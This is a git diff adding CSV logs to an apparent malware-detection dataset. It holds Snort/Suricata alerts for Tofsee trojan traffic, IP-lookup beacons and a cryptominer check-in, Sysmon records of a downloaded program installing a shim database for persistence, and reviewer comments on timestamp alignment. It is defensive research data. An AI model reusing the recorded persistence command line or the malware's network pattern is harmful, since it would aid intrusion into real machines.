(External IP Address Lookup) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 23.128.64.141:443 -> 172.16.2.2:50215","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:57.373","05/30-15:24:56.240847 [**] [1:2832022:2] ETPRO POLICY Observed Suspicious SSL Cert (External IP Address Lookup) [**] [Classification: Potential 
Corporate Privacy Violation] [Priority: 1] {TCP} 23.128.64.141:443 -> 172.16.2.2:50215","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:55.192","05/30/2020-15:24:54.000884 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:50213","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:54.368","05/30-15:24:53.835206 [**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:50213","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:52.188","05/30/2020-15:24:50.727074 [**] [1:2816531:4] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50211 -> 172.67.135.19:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:51.259","05/30-15:24:50.585847 [**] [1:2816531:3] ETPRO POLICY External IP Lookup www.trackip.net [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50211 -> 172.67.135.19:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:49.187","05/30/2020-15:24:47.215798 [**] [1:2835930:2] ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50209 -> 185.255.55.29:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:49.187","05/30/2020-15:24:47.536169 [**] [1:2833693:2] ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 185.255.55.29:443 -> 172.16.2.2:50209","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:48.258","05/30-15:24:47.202292 [**] [1:2835930:2] ETPRO POLICY Observed External IP Lookup Domain 
(api.ip .sb in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50209 -> 185.255.55.29:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:48.258","05/30-15:24:47.215198 [**] [1:2833693:2] ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 185.255.55.29:443 -> 172.16.2.2:50209","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:47.244","05/30-15:24:45.564938 [**] [1:2833693:2] ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 185.255.55.29:443 -> 172.16.2.2:50207","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:47.243","05/30-15:24:45.529777 [**] [1:2835930:2] ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50207 -> 185.255.55.29:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:46.185","05/30/2020-15:24:45.565802 [**] [1:2835930:2] ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50207 -> 185.255.55.29:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:46.185","05/30/2020-15:24:45.824744 [**] [1:2833693:2] ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 185.255.55.29:443 -> 172.16.2.2:50207","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:43.184","05/30/2020-15:24:42.402484 [**] [1:2805815:6] ETPRO POLICY IP Check Domain (whatismyipaddress .com in HTTP Host) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50204 -> 66.171.248.178:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 
15:24:43.184","05/30/2020-15:24:42.992321 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:50205","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:40.235","05/30-15:24:39.591367 [**] [1:2017398:3] ET POLICY IP Check Domain (icanhazip. com in HTTP Host) [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 172.16.2.2:50202 -> 116.202.244.153:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:40.171","05/30/2020-15:24:39.665755 [**] [1:2017398:5] ET POLICY IP Check Domain (icanhazip. com in HTTP Host) [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 172.16.2.2:50202 -> 116.202.244.153:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:39.170","05/30/2020-15:24:35.273781 [**] [1:2020716:5] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50197 -> 216.239.36.21:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:33.211","05/30-15:24:32.311010 [**] [1:2020716:2] ET POLICY Possible External IP Lookup ipinfo.io [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50197 -> 216.239.36.21:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:32.204","05/30-15:24:30.430222 [**] [1:2027905:2] ET POLICY External IP Lookup (api .ipaddress .com) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50195 -> 209.126.119.224:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:32.166","05/30/2020-15:24:30.682351 [**] [1:2027905:2] ET POLICY External IP Lookup (api .ipaddress .com) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50195 -> 209.126.119.224:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:29.201","05/30-15:24:25.283415 
[**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:50186","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:29.201","05/30-15:24:28.207581 [**] [1:2834195:2] ETPRO POLICY External IP Address Lookup via ifconfig .co [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 172.67.133.228:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:29.164","05/30/2020-15:24:28.408430 [**] [1:2834195:2] ETPRO POLICY External IP Address Lookup via ifconfig .co [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50188 -> 172.67.133.228:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:29.163","05/30/2020-15:24:25.518788 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:50186","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:22.171","05/30-15:24:21.245683 [**] [1:2026743:2] ET POLICY Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 176.58.123.25:443 -> 172.16.2.2:50183","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:22.157","05/30/2020-15:24:21.413626 [**] [1:2026743:3] ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 176.58.123.25:443 -> 172.16.2.2:50183","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:21.168","05/30-15:24:18.884632 [**] [1:2021997:1] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50181 -> 54.221.234.156:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 
15:24:21.150","05/30/2020-15:24:19.069825 [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50181 -> 54.221.234.156:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:24:14.166","05/30-15:24:13.089792 [**] [1:2017398:3] ET POLICY IP Check Domain (icanhazip. com in HTTP Host) [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 172.16.2.2:50177 -> 116.202.244.153:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:24:14.148","05/30/2020-15:24:13.113190 [**] [1:2017398:5] ET POLICY IP Check Domain (icanhazip. com in HTTP Host) [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 172.16.2.2:50177 -> 116.202.244.153:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:23:39.154","05/30-15:23:35.321386 [**] [1:2838238:2] ETPRO POLICY External IP Lookup (api .rest7 .com) [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50155 -> 37.28.155.134:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:23:39.141","05/30/2020-15:23:36.602663 [**] [1:2838238:2] ETPRO POLICY External IP Lookup (api .rest7 .com) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50155 -> 37.28.155.134:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:54.116","05/30-15:21:43.836141 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. 
io) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50061 -> 216.239.38.21:443","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:44.099","05/30/2020-15:21:43.878035 [**] [1:2028794:2] ET JA3 Hash - [Abuse.ch] Possible Tofsee [**] [Classification: Unknown Traffic] [Priority: 3] {TCP} 172.16.2.2:50061 -> 216.239.38.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:44.099","05/30/2020-15:21:43.915646 [**] [1:2025330:3] ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 216.239.38.21:443 -> 172.16.2.2:50061","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:44.098","05/30/2020-15:21:43.878035 [**] [1:2025331:3] ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) [**] [Classification: Device Retrieving External IP Address Detected] [Priority: 2] {TCP} 172.16.2.2:50061 -> 216.239.38.21:443","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.130789 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50047 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.133270 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50048 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.148124 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50049 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.217621 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was 
detected] [Priority: 1] {TCP} 172.16.2.2:50050 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.223636 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50051 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.112","05/30-15:21:26.267732 [**] [1:2808012:2] ETPRO TROJAN Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50052 -> 172.217.22.100:80","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.192755 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50048 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.204170 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50049 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.265972 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50050 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.272192 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50051 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.097","05/30/2020-15:21:26.327487 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50052 -> 
172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:29.096","05/30/2020-15:21:26.196569 [**] [1:2808012:4] ETPRO MALWARE Win32/Tofsee.AX google.com connectivity check [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50047 -> 172.217.22.100:80","/var/log/suricata/fast.log" +"May 30, 2020 @ 15:21:22.099","05/30-15:21:17.696236 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50023 -> 83.151.238.37:8080","/var/log/snort/alert.fast" +"May 30, 2020 @ 15:21:22.094","05/30/2020-15:21:17.696236 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50023 -> 83.151.238.37:8080","/var/log/suricata/fast.log" diff --git a/data/MW_28_HIDS_3.csv b/data/MW_28_HIDS_3.csv new file mode 100644 index 0000000..96bc2f2 --- /dev/null +++ b/data/MW_28_HIDS_3.csv 
@@ -0,0 +1,63 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 31, 2020 @ 09:40:28.905",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 5152; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : select ChassisTypes from Win32_SystemEnclosure; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 31, 2020 @ 09:38:58.566",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'd2abb0e472c53cbf65d10a1f2d09aa79' +New md5sum is : '9cff44496a5ed58ecd06ce03fe6410f8' +Old sha1sum was: '940d447005e78e8bd3cb6f655847dc7810917403' +New sha1sum is : '19ebed2ea7007c5bd2580630b03830bb0b2dee87' +", +"May 31, 2020 @ 09:38:58.544",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: 'e064d552ab7f45ac175a32c6fadfae16' +New md5sum is : '09f9a868702d8a69d4b62b6dc4365b29' +Old sha1sum was: '14398c675c8587716a103632fb0302df5f37982d' +New sha1sum is : '4c3792c463152bc8effee78473d7f3b3c0e8e25e' +", +"May 31, 2020 @ 09:37:34.023",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 31, 2020 @ 09:37:21.287",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 31, 2020 @ 09:32:40.919",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 2992; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT AvailableSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, +"May 31, 2020 @ 09:31:25.960",14,"ATT&CK T1138: Possible Shim Database Persistence via sdbinst.exe","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:48:30.458 +ProcessGuid: {df9fc3d3-b31e-5ecf-0000-0010800a1300} +ProcessId: 6504 +Image: C:\Windows\SysWOW64\sdbinst.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Application Compatibility Database Installer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sdbinst.exe +CommandLine: ""C:\Windows\SysWOW64\sdbinst.exe"" /q ""C:\Users\John Williams\AppData\LocalLow\hPb0FP3y.sdb"" +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300} +LogonId: 0x375CE +TerminalSessionId: 1 +IntegrityLevel: High +Hashes: 
MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2 +ParentProcessGuid: {df9fc3d3-b313-5ecf-0000-001075e51200} +ParentProcessId: 316 +ParentImage: C:\Users\John Williams\Downloads\Program28.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\Program28.exe"" ""","\""C:\\Windows\\SysWOW64\\sdbinst.exe\"" /q \""C:\\Users\\John Williams\\AppData\\LocalLow\\hPb0FP3y.sdb\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:48:30.460512700Z"",""eventRecordID"":""1991"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:48:30.458\r\nProcessGuid: {df9fc3d3-b31e-5ecf-0000-0010800a1300}\r\nProcessId: 6504\r\nImage: C:\\Windows\\SysWOW64\\sdbinst.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Application Compatibility Database Installer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sdbinst.exe\r\nCommandLine: \""C:\\Windows\\SysWOW64\\sdbinst.exe\"" /q \""C:\\Users\\John Williams\\AppData\\LocalLow\\hPb0FP3y.sdb\""\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020ce750300}\r\nLogonId: 0x375CE\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2\r\nParentProcessGuid: {df9fc3d3-b313-5ecf-0000-001075e51200}\r\nParentProcessId: 316\r\nParentImage: 
C:\\Users\\John Williams\\Downloads\\Program28.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\Program28.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-28 12:48:30.458"",""processGuid"":""{df9fc3d3-b31e-5ecf-0000-0010800a1300}"",""processId"":""6504"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\sdbinst.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Application Compatibility Database Installer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sdbinst.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\SysWOW64\\\\sdbinst.exe\\\"" /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\LocalLow\\\\hPb0FP3y.sdb\\\"""",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020ce750300}"",""logonId"":""0x375ce"",""terminalSessionId"":""1"",""integrityLevel"":""High"",""hashes"":""MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2"",""parentProcessGuid"":""{df9fc3d3-b313-5ecf-0000-001075e51200}"",""parentProcessId"":""316"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program28.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program28.exe\\\""""}}}", +"May 31, 2020 @ 09:31:15.123",14,"ATT&CK T1138: Possible Shim Database Persistence via sdbinst.exe","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:48:19.451 +ProcessGuid: {df9fc3d3-b313-5ecf-0000-001014f01200} +ProcessId: 6188 +Image: C:\Windows\SysWOW64\sdbinst.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Application Compatibility Database Installer +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sdbinst.exe +CommandLine: ""C:\Windows\System32\sdbinst.exe"" /q ""C:\Users\John 
Williams\AppData\LocalLow\hPb0FP3y.sdb"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2 +ParentProcessGuid: {df9fc3d3-b313-5ecf-0000-001075e51200} +ParentProcessId: 316 +ParentImage: C:\Users\John Williams\Downloads\Program28.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\Program28.exe"" ""","\""C:\\Windows\\System32\\sdbinst.exe\"" /q \""C:\\Users\\John Williams\\AppData\\LocalLow\\hPb0FP3y.sdb\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:48:19.455789600Z"",""eventRecordID"":""1989"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:48:19.451\r\nProcessGuid: {df9fc3d3-b313-5ecf-0000-001014f01200}\r\nProcessId: 6188\r\nImage: C:\\Windows\\SysWOW64\\sdbinst.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Application Compatibility Database Installer\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sdbinst.exe\r\nCommandLine: \""C:\\Windows\\System32\\sdbinst.exe\"" /q \""C:\\Users\\John Williams\\AppData\\LocalLow\\hPb0FP3y.sdb\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2\r\nParentProcessGuid: {df9fc3d3-b313-5ecf-0000-001075e51200}\r\nParentProcessId: 316\r\nParentImage: C:\\Users\\John Williams\\Downloads\\Program28.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\Program28.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-28 12:48:19.451"",""processGuid"":""{df9fc3d3-b313-5ecf-0000-001014f01200}"",""processId"":""6188"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\sdbinst.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Application Compatibility Database Installer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sdbinst.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\sdbinst.exe\\\"" /q \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\LocalLow\\\\hPb0FP3y.sdb\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=90B941232094F8C281AE47F8C9C8C0CF,SHA256=1B0883DA2CC4C1959D3FE8F6DE63FF9AD85F7CF9B229879C6F54B734E2C5F14D,IMPHASH=DC04DAC563E65A0D0DAE0ACCC2AC61E2"",""parentProcessGuid"":""{df9fc3d3-b313-5ecf-0000-001075e51200}"",""parentProcessId"":""316"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program28.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\Program28.exe\\\""""}}}", diff --git a/data/MW_28_NIDS.csv b/data/MW_28_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_28_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_29_HIDS_3.csv b/data/MW_29_HIDS_3.csv new file mode 100644 index 0000000..fd8315d --- /dev/null 
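Review bot: The `timestamp` column in this file is SIEM ingestion time, not event time: both `sdbinst.exe` rows are stamped `May 31, 2020 @ 09:31:…` while their Sysmon `UtcTime`/`systemTime` values are 2020-05-28 12:48:19 and 12:48:30, roughly three days earlier, so joining these rows against the `@timestamp` column of the NIDS exports will misalign them. The dataset notes should say where the real event time lives, e.g. `timestamp = Wazuh/Elastic ingestion time; take the event time from UtcTime (or data.win.system.systemTime) inside the message`. Worth recording in the sample annotation as well: the two process-create events share ParentProcessGuid `{df9fc3d3-b313-5ecf-0000-001075e51200}` (Program28.exe, PID 316), but the first runs at IntegrityLevel Medium / LogonId 0x375FD and the second, eleven seconds later, at High / LogonId 0x375CE, which looks like the dropper obtaining elevation between the two shim-database installs — to be confirmed against the full Sysmon log before it is stated as fact. The remaining rows (Winlogon checksum changes, the AutoAdminLogon benchmark failure, the WMI ExecQuery errors) cannot be attributed to the sample from this file alone.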
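Review bot: A header-only NIDS export cannot be told apart from a failed or truncated capture, and this blob (index 03c3de0) is byte-identical to `data/MW_29_NIDS.csv` further down. If this sample is later reported as producing no network alerts, the dataset needs evidence that Snort/Suricata were actually running for the run — a per-sample capture window or packet count in the overview sheet, or at least a README statement such as `Header-only *_NIDS.csv = sensors produced no alerts during the capture window; sensor health verified by <method>`. Without that, a consumer cannot distinguish a silent sample from a sensor outage.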
+++ b/data/MW_29_HIDS_3.csv 
